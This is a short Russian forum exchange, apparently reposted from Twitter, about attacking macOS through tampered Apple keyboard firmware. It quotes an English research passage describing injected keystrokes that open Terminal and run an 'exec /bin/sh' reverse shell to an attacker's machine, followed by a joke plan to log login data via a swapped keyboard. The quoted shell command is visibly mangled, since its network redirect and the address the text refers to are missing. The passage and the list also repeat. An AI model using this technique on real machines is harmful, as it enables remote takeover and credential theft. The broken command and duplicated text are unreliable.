Честно спижженое с твиттера:
@bobuk: Взлом макоси через apple keyboard firmware http://clck.ru/FcY — вот это метод, вот это я понимаю, хардкор!
exeshneg:
А где тут взлом макоси?
А ты думаешь много PC-юзеров пользуются Apple Keyboard?
А взлом макоси-то где?
Ну ты хоть ниже почитай.
"As an example, the keyboard could send the following keystrokes: COMMAND-SPACE, followed by terminal and RETURN, then followed by exec /bin/sh 0&0 2>&0 and RETURN, where 127.0.0.1 is of course replaced by the IP address of the attacker’s machine. In Mac OS X, COMMAND-SPACE activates Spotlight and terminal is typed into the Spotlight search box to launch the terminal application. Then exec is used to send a shell back to the attacker [14]. The above command just sends ...
"As an example, the keyboard could send the following keystrokes: COMMAND-SPACE, followed by terminal and RETURN, then followed by exec /bin/sh 0&0 2>&0 and RETURN, where 127.0.0.1 is of course replaced by the IP address of the attacker’s machine. In Mac OS X, COMMAND-SPACE activates Spotlight and terminal is typed into the Spotlight search box to launch the terminal application. Then exec is used to send a shell back to the attacker [14]. The above command just sends ...
1. Swap keyboard against infected one.
2. Log login data
3. Swap keyboard against original one.
4. Read login data
5. ???
6. Profit!
2. Log login data
3. Swap keyboard against original one.
4. Read login data
5. ???
6. Profit!